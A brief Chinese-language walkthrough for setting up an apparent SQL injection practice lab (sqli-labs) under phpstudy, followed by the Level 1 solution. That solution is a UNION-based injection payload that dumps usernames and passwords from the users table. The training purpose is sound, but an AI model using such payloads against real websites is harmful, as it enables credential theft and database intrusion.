环境安装:
1.下载phpstudy,并进入软件 打开nginx和mysql
2.在启动和下载完成后将压缩文件解压至phpstudy的www目录下
3.查看mysql密码并将其写入靶场配置文件中。(默认密码是root)
4.选择sql-connerctions文件。
5.在打开db-creds.inc文本。
输入127.0.0.1,
部署第一关:
1.在网站后面写入
? id=-1%27%20union%20select%201,2,group_concat(username,0x7e,password)%20from%20users%20--+
即可进入第一关。
注:若在配置环境中无法启动mysql,应是和本地mysql冲突,需改端口号。